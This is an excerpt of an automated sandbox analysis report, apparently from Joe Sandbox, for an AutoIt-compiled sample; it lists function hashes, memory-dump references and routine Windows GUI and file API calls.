                                  • Opcode ID: 67e5421499f6e0f3481b807e11b3284f724176701d64230574aa2fecd76c7d2f
                                  • Instruction ID: d5dee08db9eddb267578aaf989da1afcd745708ad83992986a9fcd606fe15e5d
                                  • Opcode Fuzzy Hash: 67e5421499f6e0f3481b807e11b3284f724176701d64230574aa2fecd76c7d2f
                                  • Instruction Fuzzy Hash: E7321821D29F014DD723A635DC22336A64DAFB73C5F25D737F81AB59A5EB29C5838200
                                  Function 0036CC39 Relevance: .6, Instructions: 635COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 10e9cd366e411705a71b6c0a9020cac60052b2ac8530e9fd29b5e9882d4753d9
                                  • Instruction ID: 1f14e6b09688e2761ae5c0225c6cc9228b6b2aa3ed63563273d87b22c544ea6b
                                  • Opcode Fuzzy Hash: 10e9cd366e411705a71b6c0a9020cac60052b2ac8530e9fd29b5e9882d4753d9
                                  • Instruction Fuzzy Hash: 66323731A201158FCF2BCF28C4906BD77A5EB47310F2AE56AD89ACB695D330DD82DB50
                                  Function 00357920 Relevance: .6, Instructions: 563COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea5785939cbadd84d92c38dad0efa63bf373a548d4a5ab8c6adb6b615f3d912f
                                  • Instruction ID: beb43a89cf0f06b005940ece6ba4c6d294fe5a4c9eb32f0886d0bcee2c48448a
                                  • Opcode Fuzzy Hash: ea5785939cbadd84d92c38dad0efa63bf373a548d4a5ab8c6adb6b615f3d912f
                                  • Instruction Fuzzy Hash: 3F22C2B0A04609DFDF16CF64D881AAEB7F5FF44301F108529E816EB2A1EB36AD55CB50
                                  Function 003591C0 Relevance: .5, Instructions: 475COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55153cb8a9a2dc2566012fc501a93c5e6428d45d86b76be7e5f82c31cf38c683
                                  • Instruction ID: dfdca79c92a36f0bb9521105edfa2a3c4bc3cf039f66d3dd6328d779fff31f74
                                  • Opcode Fuzzy Hash: 55153cb8a9a2dc2566012fc501a93c5e6428d45d86b76be7e5f82c31cf38c683
                                  • Instruction Fuzzy Hash: 2E02C7B1E00109EFDF06DF54D881AADBBB5FF44300F118569E8169B2A1EB31EE54CB95
                                  Function 00371C77 Relevance: .3, Instructions: 254COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                  • Instruction ID: f7f26eec08efb055ce44b360f2bbb561143ed921d11bca2ae2a7a1bb8f430890
                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                  • Instruction Fuzzy Hash: E39198331080A34ADB3B463E857503EFFE55A923A131B479DD4FACA5C5FE28C954DA20
                                  Function 003719B0 Relevance: .2, Instructions: 240COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                  • Instruction ID: 0fce9d1ba3838cb78568e3551aa5ceec4dcfbe7cd96f8f2916fda9d654c2b928
                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                  • Instruction Fuzzy Hash: A59161732090A34ADB7B467E857403EFFE55A923A131A879DD4FACA1C1FE18C654E620
                                  Function 00377A4A Relevance: .2, Instructions: 237COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61185163a600b3fdde301f838c0748fa49f0e976f7e41a42bbddcff246bbd994
                                  • Instruction ID: 94a76b6f62bc4b9d2363131b2574c2c9313f9c26687d784f8bc3ea03d7266927
                                  • Opcode Fuzzy Hash: 61185163a600b3fdde301f838c0748fa49f0e976f7e41a42bbddcff246bbd994
                                  • Instruction Fuzzy Hash: 3A618830348749A6EE7B9A288C99BBE2398DF41300F12C91AE94FDF781D61D9E42C755
                                  Function 00371706 Relevance: .2, Instructions: 232COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                  • Instruction ID: 7dc6271d0bcdc94f3f1ff0e4bec277d799feb3739d4aa60384a8ea832c5d6cc2
                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                  • Instruction Fuzzy Hash: C68161336080E349DB7F463E857403EFFE15A923A131B879DD4FACA5C5EE288558E660
                                  Function 01143620 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                  • Instruction ID: c00a78a2831db915aacc17de2c83af3c6646425f322821d8a83bef07f3402dd8
                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                  • Instruction Fuzzy Hash: 3341D5B1D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40
                                  Function 01143510 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                  • Instruction ID: 14e978dcb7c2460f05a0beaa2f1e6732d2268904178cae8c27ac37226be2a59a
                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                  • Instruction Fuzzy Hash: 20019278A14109EFCB48DF98C5909AEF7B5FB48710F208599D819AB741D730AE41DB80
                                  Function 011434B0 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                  • Instruction ID: 701ec10eb2d398cc3a8082906327727f725c22a623ba17c78cf15f022d1dc1ec
                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                  • Instruction Fuzzy Hash: 79019278A14109EFCB49DF98C5909AEF7B5FB48710F248599D819A7741D730AE41DB80
                                  Function 01141E70 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                  Function 003D2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 003D2B30
                                  • DeleteObject.GDI32(00000000), ref: 003D2B43
                                  • DestroyWindow.USER32 ref: 003D2B52
                                  • GetDesktopWindow.USER32 ref: 003D2B6D
                                  • GetWindowRect.USER32(00000000), ref: 003D2B74
                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 003D2CA3
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 003D2CB1
                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2CF8
                                  • GetClientRect.USER32(00000000,?), ref: 003D2D04
                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003D2D40
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2D62
                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2D75
                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2D80
                                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2D89
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2D98
                                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2DA1
                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2DA8
                                  • GlobalFree.KERNEL32(00000000), ref: 003D2DB3
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2DC5
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,003EFC38,00000000), ref: 003D2DDB
                                  • GlobalFree.KERNEL32(00000000), ref: 003D2DEB
                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 003D2E11
                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 003D2E30
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D2E52
                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003D303F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                  • String ID: $AutoIt v3$DISPLAY$static
                                  • API String ID: 2211948467-2373415609
                                  • Opcode ID: 53c446bfa3fba6e8e07444cc51e13d80b218f57bfa6f11538e970181a6b68420
                                  • Instruction ID: 6e0a7cba75552050ebbb26f5c3ba5bf1fb916016538427ebfad39ebfcc85a6d1
                                  • Opcode Fuzzy Hash: 53c446bfa3fba6e8e07444cc51e13d80b218f57bfa6f11538e970181a6b68420
                                  • Instruction Fuzzy Hash: 9C029E72610204AFDB26DF64DC89EAF7BB9FF49311F048619F915AB2A1D770AD01CB60
                                  Function 003E70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetTextColor.GDI32(?,00000000), ref: 003E712F
                                  • GetSysColorBrush.USER32(0000000F), ref: 003E7160
                                  • GetSysColor.USER32(0000000F), ref: 003E716C
                                  • SetBkColor.GDI32(?,000000FF), ref: 003E7186
                                  • SelectObject.GDI32(?,?), ref: 003E7195
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 003E71C0
                                  • GetSysColor.USER32(00000010), ref: 003E71C8
                                  • CreateSolidBrush.GDI32(00000000), ref: 003E71CF
                                  • FrameRect.USER32(?,?,00000000), ref: 003E71DE
                                  • DeleteObject.GDI32(00000000), ref: 003E71E5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 003E7230
                                  • FillRect.USER32(?,?,?), ref: 003E7262
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E7284
                                    • Part of subcall function 003E73E8: GetSysColor.USER32(00000012), ref: 003E7421
                                    • Part of subcall function 003E73E8: SetTextColor.GDI32(?,?), ref: 003E7425
                                    • Part of subcall function 003E73E8: GetSysColorBrush.USER32(0000000F), ref: 003E743B
                                    • Part of subcall function 003E73E8: GetSysColor.USER32(0000000F), ref: 003E7446
                                    • Part of subcall function 003E73E8: GetSysColor.USER32(00000011), ref: 003E7463
                                    • Part of subcall function 003E73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003E7471
                                    • Part of subcall function 003E73E8: SelectObject.GDI32(?,00000000), ref: 003E7482
                                    • Part of subcall function 003E73E8: SetBkColor.GDI32(?,00000000), ref: 003E748B
                                    • Part of subcall function 003E73E8: SelectObject.GDI32(?,?), ref: 003E7498
                                    • Part of subcall function 003E73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003E74B7
                                    • Part of subcall function 003E73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003E74CE
                                    • Part of subcall function 003E73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003E74DB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                  • String ID:
                                  • API String ID: 4124339563-0
                                  • Opcode ID: 46d638ef78271151614791ea3972b6a1ee6bea1f78484e4d0f84a7359f44e596
                                  • Instruction ID: fab7c06cb8e5b05b6ba61ba6194c89726883b3684a1414551c023d7adfa4bbfc
                                  • Opcode Fuzzy Hash: 46d638ef78271151614791ea3972b6a1ee6bea1f78484e4d0f84a7359f44e596
                                  • Instruction Fuzzy Hash: FCA1B172018391AFDB229F61DC88E5F7BADFB49320F101B19FA629A1E0D731E845CB51
                                  Function 00368D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DestroyWindow.USER32(?,?), ref: 00368E14
                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 003A6AC5
                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003A6AFE
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003A6F43
                                    • Part of subcall function 00368F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00368BE8,?,00000000,?,?,?,?,00368BBA,00000000,?), ref: 00368FC5
                                  • SendMessageW.USER32(?,00001053), ref: 003A6F7F
                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003A6F96
                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 003A6FAC
                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 003A6FB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                  • String ID: 0
                                  • API String ID: 2760611726-4108050209
                                  • Opcode ID: 942e940500ad4a0bb66c5c1d04860d03fc6771c9e2708e140a8f2e77121e75eb
                                  • Instruction ID: 602efb88c6d2d771f50a3b6104934bbb18cc9b0f0552584ce3ef598ec634fafa
                                  • Opcode Fuzzy Hash: 942e940500ad4a0bb66c5c1d04860d03fc6771c9e2708e140a8f2e77121e75eb
                                  • Instruction Fuzzy Hash: 3912C070200241DFD727CF14C895BAABBE5FB5A310F598669F485CB6A1CB32EC92CB51
                                  Function 003D2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DestroyWindow.USER32(00000000), ref: 003D273E
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003D286A
                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003D28A9
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003D28B9
                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 003D2900
                                  • GetClientRect.USER32(00000000,?), ref: 003D290C
                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 003D2955
                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003D2964
                                  • GetStockObject.GDI32(00000011), ref: 003D2974
                                  • SelectObject.GDI32(00000000,00000000), ref: 003D2978
                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003D2988
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D2991
                                  • DeleteDC.GDI32(00000000), ref: 003D299A
                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003D29C6
                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 003D29DD
                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 003D2A1D
                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003D2A31
                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 003D2A42
                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 003D2A77
                                  • GetStockObject.GDI32(00000011), ref: 003D2A82
                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003D2A8D
                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003D2A97
                                  Strings
